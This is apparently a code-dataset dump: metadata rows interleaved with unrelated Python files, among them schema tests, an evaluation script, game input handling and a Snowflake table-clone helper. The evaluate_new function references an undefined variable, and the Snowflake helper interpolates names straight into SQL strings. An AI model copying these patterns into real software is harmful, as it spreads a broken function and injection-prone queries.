| 47.238956 | 1,080 | 0.609224 | 2,546 | 23,525 | 5.412019 | 0.098979 | 0.057479 | 0.016257 | 0.020901 | 0.8923 | 0.865447 | 0.849336 | 0.839321 | 0.839321 | 0.830757 | 0 | 0.000931 | 0.315112 | 23,525 | 497 | 1,081 | 47.334004 | 0.85427 | 0.380234 | 0 | 0.741803 | 0 | 0 | 0.187219 | 0.033224 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036885 | false | 0 | 0.028689 | 0 | 0.118852 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfc4cd6005db9cf1b8f37ec9800f76bed23a0fe2 | 2,953 | py | Python | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | 1 | 2016-09-16T04:09:19.000Z | 2016-09-16T04:09:19.000Z | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | 2 | 2021-06-14T05:53:49.000Z | 2022-02-01T14:26:31.000Z | tests/dict/test_dict_add.py | nikitanovosibirsk/district42 | 0c13248919fc96bde16b9634a8ea468e4882752a | [
"Apache-2.0"
] | null | null | null | from baby_steps import given, then, when
from district42 import optional, schema
def test_dict_add():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str})
def test_dict_add_overide():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"id": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.str
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"id": schema.str})
def test_dict_add_optional():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str, optional("created_at"): schema.int})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
optional("created_at"): schema.int
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str, optional("created_at"): schema.int})
def test_dict_add_optional_override():
with given:
sch1 = schema.dict({"id": schema.int, optional("created_at"): schema.int})
sch2 = schema.dict({"name": schema.str, "created_at": schema.int})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
"created_at": schema.int
})
assert sch1 == schema.dict({"id": schema.int, optional("created_at"): schema.int})
assert sch2 == schema.dict({"name": schema.str, "created_at": schema.int})
def test_dict_add_relaxed_left():
with given:
sch1 = schema.dict({"id": schema.int, ...: ...})
sch2 = schema.dict({"name": schema.str})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
...: ...,
"name": schema.str
})
assert sch1 == schema.dict({"id": schema.int, ...: ...})
assert sch2 == schema.dict({"name": schema.str})
def test_dict_add_relaxed_right():
with given:
sch1 = schema.dict({"id": schema.int})
sch2 = schema.dict({"name": schema.str, ...: ...})
with when:
res = sch1 + sch2
with then:
assert res == schema.dict({
"id": schema.int,
"name": schema.str,
...: ...,
})
assert sch1 == schema.dict({"id": schema.int})
assert sch2 == schema.dict({"name": schema.str, ...: ...})
| 27.091743 | 92 | 0.531663 | 348 | 2,953 | 4.428161 | 0.086207 | 0.194679 | 0.155743 | 0.233615 | 0.932511 | 0.913043 | 0.895522 | 0.895522 | 0.866321 | 0.862427 | 0 | 0.01842 | 0.301388 | 2,953 | 108 | 93 | 27.342593 | 0.728551 | 0 | 0 | 0.722892 | 0 | 0 | 0.060955 | 0 | 0 | 0 | 0 | 0 | 0.216867 | 1 | 0.072289 | false | 0 | 0.024096 | 0 | 0.096386 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
cfed8c77913c552481342c4e65b8de66e0daa80f | 950 | py | Python | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | 1 | 2021-01-28T06:47:39.000Z | 2021-01-28T06:47:39.000Z | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null | octicons16px/tools.py | andrewp-as-is/octicons16px.py | 1272dc9f290619d83bd881e87dbd723b0c48844c | [
"Unlicense"
] | null | null | null |
OCTICON_TOOLS = """
<svg class="octicon octicon-tools" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" width="16" height="16"><path fill-rule="evenodd" d="M5.433 2.304A4.494 4.494 0 003.5 6c0 1.598.832 3.002 2.09 3.802.518.328.929.923.902 1.64v.008l-.164 3.337a.75.75 0 11-1.498-.073l.163-3.33c.002-.085-.05-.216-.207-.316A5.996 5.996 0 012 6a5.994 5.994 0 012.567-4.92 1.482 1.482 0 011.673-.04c.462.296.76.827.76 1.423v2.82c0 .082.041.16.11.206l.75.51a.25.25 0 00.28 0l.75-.51A.25.25 0 009 5.282V2.463c0-.596.298-1.127.76-1.423a1.482 1.482 0 011.673.04A5.994 5.994 0 0114 6a5.996 5.996 0 01-2.786 5.068c-.157.1-.209.23-.207.315l.163 3.33a.75.75 0 11-1.498.074l-.164-3.345c-.027-.717.384-1.312.902-1.64A4.496 4.496 0 0012.5 6a4.494 4.494 0 00-1.933-3.696c-.024.017-.067.067-.067.16v2.818a1.75 1.75 0 01-.767 1.448l-.75.51a1.75 1.75 0 01-1.966 0l-.75-.51A1.75 1.75 0 015.5 5.282V2.463c0-.092-.043-.142-.067-.159zm.01-.005z"></path></svg>
"""
| 190 | 924 | 0.676842 | 244 | 950 | 2.631148 | 0.508197 | 0.023364 | 0.023364 | 0.028037 | 0.161994 | 0.115265 | 0 | 0 | 0 | 0 | 0 | 0.573733 | 0.086316 | 950 | 4 | 925 | 237.5 | 0.165899 | 0 | 0 | 0 | 0 | 0.333333 | 0.975764 | 0.420443 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
cfef93a27046eab551c52712e0a77ea8daa87a0f | 1,403 | py | Python | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 38 | 2021-05-14T15:59:43.000Z | 2022-03-24T14:43:41.000Z | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 3 | 2021-08-03T09:50:59.000Z | 2022-03-30T03:17:19.000Z | DialogRE/bert/calc-categorized-f1.py | muyeby/AMR-Dialogue | 261535c407be6c166016e4759bc81176b1c99957 | [
"MIT"
] | 3 | 2021-08-01T23:54:12.000Z | 2021-10-05T01:37:14.000Z | # coding:utf-8
def evaluate(devp, data):
index = 0
correct_sys, all_sys = 0, 0
correct_gt = 0
for i in range(len(data)):
for j in range(len(data[i][1])): # K
for id in data[i][1][j]["rid"]:
if id != 36:
correct_gt += 1
if id in devp[index]:
correct_sys += 1
for id in devp[index]:
if id != 36:
all_sys += 1
index += 1
precision = correct_sys / all_sys if all_sys != 0 else 1
recall = correct_sys / correct_gt if correct_gt != 0 else 0
f_1 = 2 * precision * recall / (precision + recall) if precision + recall != 0 else 0
return precision, recall, f_1
def evaluate_new(devp, ref):
index = 0
correct_sys, all_sys = 0, 0
correct_gt = 0
assert len(devp) == len(ref)
for i in range(len(data)):
for id in data[i]:
if id != 36:
correct_gt += 1
if id in devp[index]:
correct_sys += 1
for id in devp[i]:
if id != 36:
all_sys += 1
precision = correct_sys / all_sys if all_sys != 0 else 1
recall = correct_sys / correct_gt if correct_gt != 0 else 0
f_1 = 2 * precision * recall / (precision + recall) if precision + recall != 0 else 0
return precision, recall, f_1
| 31.177778 | 89 | 0.510335 | 205 | 1,403 | 3.35122 | 0.165854 | 0.116448 | 0.075691 | 0.093159 | 0.850073 | 0.819505 | 0.783115 | 0.72198 | 0.72198 | 0.72198 | 0 | 0.051462 | 0.390592 | 1,403 | 44 | 90 | 31.886364 | 0.752047 | 0.009979 | 0 | 0.756757 | 0 | 0 | 0.002166 | 0 | 0 | 0 | 0 | 0 | 0.027027 | 1 | 0.054054 | false | 0 | 0 | 0 | 0.108108 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5caa01c1bf83a600dd0774deba8507ac89a07a8f | 4,856 | py | Python | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | tests/test_podinterpolation.py | twisterbboy/EZyRB | ab72235ec6703f4ac58d5faebaade40dfb6d326c | [
"MIT"
] | null | null | null | from unittest import TestCase
import unittest
import numpy as np
import filecmp
import os
import sys
from ezyrb.podinterpolation import PODInterpolation
from ezyrb.parametricspace import ParametricSpace
from ezyrb.points import Points
from ezyrb.snapshots import Snapshots
from ezyrb.ndinterpolator.linear import LinearInterpolator
class TestPODInterpolation(TestCase):
def test_pod(self):
space = PODInterpolation()
def test_generate(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
assert space.pod_basis.shape == (2500, 4)
def test_interpolator(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
assert isinstance(space.interpolator, LinearInterpolator)
def test_call(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
#mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
#snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
solution = space([0, 0])
assert solution.shape == (2500, 1)
def test_save(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
space.save("tests/test_datasets/podspace")
assert os.path.isfile("tests/test_datasets/podspace")
#os.remove("tests/test_datasets/podspace")
def test_load(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
space.generate(mu, snap)
space.save("tests/test_datasets/podspace")
another_space = ParametricSpace.load("tests/test_datasets/podspace")
assert another_space.pod_basis.shape == (2500, 4)
os.remove("tests/test_datasets/podspace")
def test_loo_error(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
error = space.loo_error(mu, snap)
assert error.shape == (4, )
def test_loo_error2(self):
mu = Points()
snap = Snapshots(output_name="Pressure", dformat="point")
space = PODInterpolation()
mu.append([-.5, -.5])
mu.append([.5, -.5])
mu.append([.5, .5])
mu.append([-.5, .5])
snap.append("tests/test_datasets/matlab_00.vtk")
snap.append("tests/test_datasets/matlab_01.vtk")
snap.append("tests/test_datasets/matlab_02.vtk")
snap.append("tests/test_datasets/matlab_03.vtk")
error = space.loo_error(mu, snap)
np.testing.assert_almost_equal(max(error), 0.149130165577, decimal=4)
| 37.353846 | 77 | 0.622323 | 610 | 4,856 | 4.811475 | 0.114754 | 0.104259 | 0.196934 | 0.0954 | 0.770698 | 0.758092 | 0.742419 | 0.742419 | 0.715162 | 0.715162 | 0 | 0.038472 | 0.223847 | 4,856 | 129 | 78 | 37.643411 | 0.740249 | 0.022446 | 0 | 0.73913 | 0 | 0 | 0.236509 | 0.217327 | 0 | 0 | 0 | 0 | 0.06087 | 1 | 0.069565 | false | 0 | 0.095652 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
5cb2ee3d06ddcf886f55d4150d38653c7d632df6 | 349 | py | Python | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | calendar42/SleekXMPP--XEP-0080- | d7bd5fd29f26a5d7de872a49ff63a353b8043e49 | [
"BSD-3-Clause"
] | 1 | 2019-04-12T12:20:12.000Z | 2019-04-12T12:20:12.000Z | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | vijayp/SleekXMPP | b2e7f57334d27f140f079213c2016615b7168742 | [
"BSD-3-Clause"
] | null | null | null | sleekxmpp/thirdparty/suelta/mechanisms/__init__.py | vijayp/SleekXMPP | b2e7f57334d27f140f079213c2016615b7168742 | [
"BSD-3-Clause"
] | 1 | 2020-05-06T18:46:53.000Z | 2020-05-06T18:46:53.000Z | from sleekxmpp.thirdparty.suelta.mechanisms.anonymous import ANONYMOUS
from sleekxmpp.thirdparty.suelta.mechanisms.plain import PLAIN
from sleekxmpp.thirdparty.suelta.mechanisms.cram_md5 import CRAM_MD5
from sleekxmpp.thirdparty.suelta.mechanisms.digest_md5 import DIGEST_MD5
from sleekxmpp.thirdparty.suelta.mechanisms.scram_hmac import SCRAM_HMAC
| 58.166667 | 72 | 0.885387 | 46 | 349 | 6.586957 | 0.282609 | 0.214521 | 0.379538 | 0.478548 | 0.663366 | 0.277228 | 0 | 0 | 0 | 0 | 0 | 0.012158 | 0.057307 | 349 | 5 | 73 | 69.8 | 0.908815 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7a505a139b503133df8915a9582fcf8bf821c355 | 5,140 | py | Python | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | scripts/screen.py | saidwho12/JulyGame | 064654aaaf516931a074ce4d5021f2ecdbe621e0 | [
"MIT"
] | null | null | null | from pyglfw.libapi import *
from scripts import (gui,
input_manager)
class Screen:
def __init__(self, engine):
self.engine = engine
self.elements = {}
def on_enter(self):
pass
def on_leave(self):
pass
def on_joy_stick(self, axis, dx, dy):
pass
def on_joy_button_down(self, button):
pass
def on_joy_button_up(self, button):
pass
def on_key_down(self, key):
pass
def on_key_up(self, key):
pass
def on_mouse_down(self, button, x, y):
pass
def on_mouse_up(self, button, x, y):
pass
def on_mouse_move(self, x, y, dx, dy):
pass
def on_size(self, w, h):
pass
def draw(self, renderer):
for e in self.elements.itervalues():
e.draw(renderer)
def update(self, dt):
pass
class GameScreen(Screen):
def __init__(self, engine):
self.engine = engine
self.elements = {'game_display': gui.GameDisplay(self.engine),
'health': gui.StatBar(self.engine, 'button_down', (0, 1, 0), 0),
'fuel': gui.StatBar(self.engine, 'button_down', (0, 0, 1), 1)}
def on_enter(self):
self.engine.input_manager.toggle_mouse_lock(True)
def on_leave(self):
self.engine.input_manager.toggle_mouse_lock(False)
def on_joy_stick(self, stick, dx, dy):
if stick is 0:
self.engine.game_manager.player.set_input(dx, dy)
elif stick is 1:
self.engine.renderer.camera.rotate(dx, dy)
def on_joy_button_down(self, button):
if button == input_manager.A:
self.engine.game_manager.player.do_jump()
elif button == input_manager.Y:
self.engine.game_manager.player.drive()
elif button == input_manager.LT_BUTTON:
self.engine.game_manager.player.left_trigger_down()
elif button == input_manager.RT_BUTTON:
self.engine.game_manager.player.right_trigger_down()
elif button == input_manager.START:
self.engine.screen_manager.transition('menu')
def on_joy_button_up(self, button):
if button == input_manager.A:
self.engine.game_manager.player.stop_jump()
elif button == input_manager.LT_BUTTON:
self.engine.game_manager.player.left_trigger_up()
elif button == input_manager.RT_BUTTON:
self.engine.game_manager.player.right_trigger_up()
def on_key_down(self, key):
if key is GLFW_KEY_D:
self.engine.game_manager.player.add_input(1, 0)
elif key is GLFW_KEY_A:
self.engine.game_manager.player.add_input(-1, 0)
elif key is GLFW_KEY_W:
self.engine.game_manager.player.add_input(0, -1)
elif key is GLFW_KEY_S:
self.engine.game_manager.player.add_input(0, 1)
elif key is GLFW_KEY_E:
self.engine.game_manager.player.drive()
elif key is GLFW_KEY_SPACE:
self.engine.game_manager.player.do_jump()
def on_key_up(self, key):
if key is GLFW_KEY_D:
self.engine.game_manager.player.add_input(-1, 0)
elif key is GLFW_KEY_A:
self.engine.game_manager.player.add_input(1, 0)
elif key is GLFW_KEY_W:
self.engine.game_manager.player.add_input(0, 1)
elif key is GLFW_KEY_S:
self.engine.game_manager.player.add_input(0, -1)
elif key is GLFW_KEY_SPACE:
self.engine.game_manager.player.stop_jump()
def on_mouse_down(self, button, x, y):
if button == 1:
self.engine.game_manager.player.left_trigger_down()
elif button == 0:
self.engine.game_manager.player.right_trigger_down()
def on_mouse_up(self, button, x, y):
if button == 1:
self.engine.game_manager.player.left_trigger_up()
elif button == 0:
self.engine.game_manager.player.right_trigger_up()
def on_mouse_move(self, x, y, dx, dy):
self.engine.renderer.camera.rotate(dx, dy)
class MenuScreen(Screen):
def __init__(self, engine):
self.engine = engine
self.play_button = gui.Button(self.engine, (0, 0), (.2, .2),
'button_down', 'button_normal',
'button_over')
self.elements = {'background': gui.Background(self.engine, 'download'),
'play_button': self.play_button}
def on_mouse_move(self, x, y, dx, dy):
self.play_button.collide_point(*self.engine.screen_manager.pixel_to_screen(x, y))
def on_mouse_down(self, button, x, y):
sx, sy = self.engine.screen_manager.pixel_to_screen(x, y)
if self.play_button.collide_point(sx, sy):
self.play_button.on_click(sx, sy)
self.engine.screen_manager.transition('game')
def on_mouse_up(self, button, x, y):
sx, sy = self.engine.screen_manager.pixel_to_screen(x, y)
if self.play_button.collide_point(sx, sy):
self.play_button.on_release(sx, sy)
| 31.728395 | 89 | 0.6107 | 718 | 5,140 | 4.118384 | 0.133705 | 0.145418 | 0.108894 | 0.163341 | 0.825161 | 0.773081 | 0.729117 | 0.625634 | 0.557998 | 0.522489 | 0 | 0.009212 | 0.281907 | 5,140 | 161 | 90 | 31.925466 | 0.791926 | 0 | 0 | 0.713115 | 0 | 0 | 0.022568 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.237705 | false | 0.098361 | 0.016393 | 0 | 0.278689 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
7a8f6fddd0e4b93694af7a34857430717f10bda6 | 169 | py | Python | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | integration/test_app.py | RUOK90/MLOps_practice | 1c834165239429294debbcd0712f3df4087f9171 | [
"MIT"
] | null | null | null | # TODO(everyone): 웹서버의 healthz가 response code 200 확인
import requests
def test_healthz():
assert requests.get('http://127.0.0.1:5000/healthz').status_code == 200
| 18.777778 | 75 | 0.721893 | 26 | 169 | 4.615385 | 0.807692 | 0.116667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110345 | 0.142012 | 169 | 8 | 76 | 21.125 | 0.717241 | 0.295858 | 0 | 0 | 0 | 0 | 0.247863 | 0 | 0 | 0 | 0 | 0.125 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
7aa94dd39248a7f28059f396e9f4bef4d122473e | 676 | py | Python | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 3 | 2019-10-12T15:44:50.000Z | 2021-08-13T00:18:03.000Z | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 2 | 2021-06-02T00:29:05.000Z | 2021-08-14T19:39:21.000Z | tests/test_tools.py | BenAAndrew/Python-Image-Fetcher | 569e920c587df5ca0a8b8566446bb6f00cade56e | [
"MIT"
] | 1 | 2022-01-23T07:42:09.000Z | 2022-01-23T07:42:09.000Z | from image_fetcher.tools import escape_image_name
class TestTools:
def test_escape_image_name_http(self):
url = "http://www.fakewebsite.com/sample.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
def test_escape_image_name_https(self):
url = "https://www.fakewebsite.com/sample.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
def test_escape_image_name_non_alphanumeric_characters(self):
url = "https://www.fakewebsite!.com/sample$_.jpg"
result = escape_image_name(url)
assert result == "wwwfakewebsitecomsample.jpg"
| 35.578947 | 65 | 0.70858 | 81 | 676 | 5.617284 | 0.320988 | 0.169231 | 0.230769 | 0.118681 | 0.778022 | 0.72967 | 0.72967 | 0.72967 | 0.72967 | 0.72967 | 0 | 0 | 0.192308 | 676 | 18 | 66 | 37.555556 | 0.833333 | 0 | 0 | 0.428571 | 0 | 0 | 0.29142 | 0.119822 | 0 | 0 | 0 | 0 | 0.214286 | 1 | 0.214286 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8f4450134a17c1cb60c6f383f3c180aaa49af55e | 1,044 | py | Python | torchswe/utils/data/__init__.py | piyueh/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | 2 | 2022-03-07T09:22:27.000Z | 2022-03-24T02:30:30.000Z | torchswe/utils/data/__init__.py | reyhashemi/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | null | null | null | torchswe/utils/data/__init__.py | reyhashemi/TorchSWE | 3faa18d83e24ae0b74966777516458eb1aa6f480 | [
"BSD-3-Clause"
] | 2 | 2021-05-18T10:56:56.000Z | 2022-01-11T09:12:09.000Z | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
#
# Copyright © 2020-2021 Pi-Yueh Chuang <pychuang@gwu.edu>
#
# Distributed under terms of the BSD 3-Clause license.
"""Data structs of TorchSWE.
"""
from torchswe.utils.data.grid import Gridline
from torchswe.utils.data.grid import Timeline
from torchswe.utils.data.grid import Domain
from torchswe.utils.data.grid import get_gridline_x
from torchswe.utils.data.grid import get_gridline_y
from torchswe.utils.data.grid import get_timeline
from torchswe.utils.data.grid import get_domain
from torchswe.utils.data.topography import Topography
from torchswe.utils.data.topography import get_topography
from torchswe.utils.data.states import States
from torchswe.utils.data.states import get_empty_states
from torchswe.utils.data.states import get_initial_states
from torchswe.utils.data.source import PointSource
from torchswe.utils.data.source import FrictionModel
from torchswe.utils.data.source import get_pointsource
from torchswe.utils.data.source import get_frictionmodel
| 34.8 | 57 | 0.820881 | 159 | 1,044 | 5.314465 | 0.301887 | 0.227219 | 0.321893 | 0.397633 | 0.769231 | 0.72426 | 0.485207 | 0.198817 | 0 | 0 | 0 | 0.011665 | 0.096743 | 1,044 | 29 | 58 | 36 | 0.883351 | 0.184866 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8f65151dfe3cd61bb59c4b381e7430155affddf3 | 6,253 | py | Python | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | 3 | 2021-02-02T15:09:35.000Z | 2021-04-29T17:48:10.000Z | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | null | null | null | cloudy_warehouses/copy_snowflake.py | hashmapinc/cloudy_warhouses | a691529e0cc355a9d8b04acbd4ea42c24c2933fe | [
"Apache-2.0"
] | null | null | null | from cloudy_warehouses.snowflake_objects.snowflake_object import SnowflakeObject
# Copier Object
class SnowflakeCopier(SnowflakeObject):
"""Class that holds the clone and clone_empty methods."""
# sql that is run by the cursor object
sql_statement = str
def clone(self, new_table: str, source_table: str, source_schema: str = None, source_database: str = None,
database: str = None, schema: str = None, username: str = None, password: str = None,
account: str = None, role: str = None, warehouse: str = None):
"""method that creates a copy of a Snowflake table."""
try:
# initialize Snowflake connection and configure credentials
self.initialize_snowflake(
database=database,
schema=schema,
username=username,
password=password,
account=account,
warehouse=warehouse,
role=role
)
# build sql statement to be executed by the cursor object
if source_database and source_schema:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_database}.{source_schema}.{source_table}"
elif source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_schema}.{source_table}"
elif not source_schema and not source_database:
self.sql_statement = f"CREATE OR REPLACE TABLE {self.sf_credentials['database']}.{self.sf_credentials['schema']}.{new_table} CLONE " \
f"{source_table}"
else:
self.log_message = "Error: please call this method with the proper values. Example: If you call this " \
"method with the 'source_database' parameter, " \
"you must include a 'source_schema' parameter as well"
self._logger.error(self.log_message)
return False
# execute sql statement
self.cursor = self.connection.cursor()
# use warehouse if not None
if self.sf_credentials['warehouse']:
self.cursor.execute(f"use warehouse {self.sf_credentials['warehouse']};")
self.cursor.execute(self.sql_statement)
# catch and log error
except Exception as e:
self.log_message = e
